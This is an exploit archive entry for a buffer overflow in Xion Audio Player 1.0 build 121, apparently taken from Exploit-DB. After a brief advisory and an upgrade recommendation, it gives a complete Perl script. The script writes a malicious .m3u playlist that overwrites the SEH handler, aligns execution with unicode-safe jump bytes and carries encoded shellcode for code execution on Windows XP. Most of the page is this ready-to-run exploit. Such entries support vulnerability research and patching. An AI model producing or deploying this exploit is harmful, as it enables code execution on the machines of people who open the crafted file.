Xion Audio Player Local BOF

vendor:

Xion Audio Player

by:

Dragon Rider

9.3

CVSS

HIGH

Local and Remote Code Execution

119

CWE

Product Name: Xion Audio Player

Affected Version From: 1.0 build 121

Affected Version To: 1.0 build 121

Patch Exists: YES

Related CWE: N/A

CPE: a:xion_audio_player:xion_audio_player

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

Xion Audio Player Local BOF

Xion Audio Player is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer. An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.

Mitigation:

Upgrade to the latest version of Xion Audio Player

Source

Exploit-DB raw data:

# [*] Vulnerability     : Xion Audio Player Local BOF
# [*] Discovered by     : Dragon Rider (http://securityreason.com/exploitalert/7392)
# [*]                     drag0n.rider(at)hotmail.com
# [*] Sploit written by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com)
# [*] Sploit released   : nov 3rd, 2009
# [*] Type              : local and remote code execution
# [*] OS                : Windows
# [*] Product           : Xion Audio Player
# [*] Versions affected : 1.0 build 121
# [*] Download from     : http://www.brothersoft.com/xion-audio-player-download-49404.html
# [*] -------------------------------------------------------------------------
# [*] Method            : SEH
# [*] Tested on         : XP SP3 En
# [*] Greetz&Tx to      : DellNull/EdiStrosar/F/P/W
# [*] -------------------------------------------------------------------------
#                                               MMMMM~.                          
#                                               MMMMM?.                          
#    MMMMMM8.  .=MMMMMMM.. MMMMMMMM, MMMMMMM8.  MMMMM?. MMMMMMM:   MMMMMMMMMM.   
#  MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:  
#  MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:  
#  MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:  
#  MMMMM=.     MMMMM=MMMMM=MMMMM7. 8MMMMM?    . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:  
#  MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:  
#  =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:  
#  .:$MMMMMO7:..+OMMMMMO$=.MMMMM7.  ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:  
#     .,,,..      .,,,,.   .,,,,,     ..,,,..   .,,,,.. .,,...,,,. .,,,,..,,,,.  
#                                                                   eip hunters
# -----------------------------------------------------------------------------
# Script provided 'as is', without any warranty. 
# Use for educational purposes only.
#
my $sploitfile="corelansploit.m3u";
my $junk = "\x41" x 254;  
my $nseh="\x58\x48"; 
my $seh="\xf5\x48"; 
my $align="\x55";  
$align=$align."\x6d";   
$align=$align."\x58";   
$align=$align."\x6d";   
$align = $align."\x05\x10\x11";   
$align=$align."\x6d";  
$align=$align."\x2d\x02\x11";  
$align=$align."\x6d";   

my $jump = "\x50";  
$jump=$jump."\x6d"; 
$jump=$jump."\xc3";

my $padding="A" x 73;

my $shellcode="PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLK8Q4KPKPKP4KQ5OLTKSLLERXM1JOTK0OLXDK1OO0M1JKPITK044KKQJN01WPTYVLE4Y0BTKW91WZLMKQ7RJKZTOKB4NDLDCE9UDKQOMTKQJKRFDKLLPKTKQOMLKQJKTKMLDKKQZKSYQLO4M4WSNQGPBDTKOPNPSUY0D8LLTKOPLLTKRPML6MTK2HKXZKM94K3PVPKPKPKPDK1XOL1ONQJVC0PVTIL853WP3K0PBHZPTJKTQO2HV8KNSZLNPWKOYWQSQQRLQSKPA";

my $filler = ("\xcc" x (17990-length($shellcode)));
my $payload = $junk.$nseh.$seh.$align.$jump.$padding.$shellcode.$filler;
open(myfile,">$sploitfile"); 
print myfile $payload; 
print "Wrote " . length($payload)." bytes to $sploitfile\n";
close(myfile);